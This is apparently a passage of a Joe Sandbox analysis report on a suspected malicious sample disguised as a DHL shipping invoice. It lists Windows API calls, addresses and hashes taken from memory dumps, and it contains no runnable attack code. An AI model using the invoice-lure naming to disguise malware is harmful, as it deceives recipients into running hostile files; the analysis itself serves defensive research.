                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                                                                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                      • String ID: d=E
                                                                                                                                                                                                                                      • API String ID: 909852535-3703654223
                                                                                                                                                                                                                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                                                                                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                                      • String ID: URL
                                                                                                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                                                                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401917
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
